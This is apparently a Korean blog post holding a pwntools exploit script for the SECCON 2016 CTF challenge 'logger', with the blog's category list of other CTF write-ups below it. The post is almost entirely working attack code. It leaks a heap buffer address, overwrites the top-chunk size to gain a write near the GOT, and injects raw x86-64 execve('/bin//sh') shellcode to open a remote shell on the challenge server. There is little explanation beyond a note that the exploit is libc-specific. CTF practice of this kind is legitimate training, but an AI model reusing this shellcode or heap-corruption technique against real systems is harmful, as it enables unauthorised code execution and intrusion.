SECCON 2016 logger

Games/CTF 2016.12.11 20:53

'''

with zzoru.

extreamly LIBC-specific exploit.

1/16 chance to get shell.

'''


from pwn import *

import os

import random


DEBUG = True

context(os='linux',arch='amd64')


#p1 = process("./logger")

p1 = remote('logger.pwn.seccon.jp', 6565)

#p2 = process("./logger")

p2 = remote('logger.pwn.seccon.jp', 6565)


R = str(random.randrange(10000))

def login(process):

    global R

    name = 'zzoru'+R

    password = 'zzoru5'+R

    process.sendline('1')

    process.recvuntil('Name    :')

    process.sendline(name)

    process.recvuntil('Password:')

    process.sendline(password)

    process.recvuntil('4. exit')


def debug(process, address):

gdb.attach(process, 'b *0x%x' % address)

raw_input()


def read_log(process):

process.sendline('1')

print '=== log ==='

#print process.recvuntil('1. Readlog')

print process.recv(4096)


def write_log(process,size, log):

process.sendline('2')

process.recvuntil('Log size(max 128byte):')

process.sendline(str(size))

if size > 0:

process.sendline(log)

#process.recvuntil('4.exit')



def buf_leak(process):

process.sendline('3')

process.recvuntil('4. exit')

process.recvline()

process.sendline('3')

process.recvuntil('filename: ')

print '[+] filename : %s ' % process.recv(32)

# leak = process.recv(8)

# if len(leak) == 8:

# buf = u64(leak)

# print 'buf addr: = 0x%x' % buf

# return buf

# else:

# print 'leak error ' + enhex(leak)

leak = process.recv(4)

print enhex(leak)


if leak[3] != '\x3d':

buf = u32(leak)

else:

buf = u32(leak[0:3]+'\x00')

print 'buf addr: = 0x%x' % buf

return buf

write_got = 0x602020

shell_code = "\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"


os.system('rm /tmp/logger/*')

#p1 = process('./logger')

p1 = remote('logger.pwn.seccon.jp', 6565)

login(p1)

#write_log(p1, 128, p64(write_got+0x8) +  shell_code  + '\x90' * (128-8-len(shell_code)))


payload = p64(0x41414141)

payload += p64(0x42424242)

payload += p64(0x43434343)

payload += p64(0x602040)

payload += (shell_code + 'z'*(72-len(shell_code)))

payload += '\x20\xa4'

#payload += shell_code

write_log(p1, 128, payload + '\x00' * (128-len(payload)))

write_log(p1, 128, 'b' * 128)

#write_log(p1, -1, 'A')

#p1.interactive()

p1.recvline()

p1.close()


sleep(.1)

#p1 = process('./logger')

p1 = remote('logger.pwn.seccon.jp', 6565)

#p2 = process('./logger')

p2 = remote('logger.pwn.seccon.jp', 6565)


login(p1)

login(p2)


topchunk_size = 0xffffffffffffffff

buf_addr = buf_leak(p2)

write_log(p1, 32, pack(topchunk_size) + pack(topchunk_size))

sleep(.5)

read_log(p2)

print hex(buf_addr)

sleep(.5)

write_log(p2, write_got-8*2-buf_addr-0x100-0x10, 'AAAA' )

p2.sendline('1')

p2.sendline('ls -al')

p2.interactive()



저작자 표시
신고

'Games > CTF' 카테고리의 다른 글

SECCON 2016 cheer_msg  (0) 2016.12.12
SECCON 2016 checker  (0) 2016.12.12
SECCON 2016 logger  (0) 2016.12.11
SECCON 2016 jumper  (0) 2016.12.11
SECCON 2016 chat  (0) 2016.12.11
Tokyo Westerns MMA CTF 2016 interpreter  (0) 2016.09.05
Posted by daehee87

댓글을 달아 주세요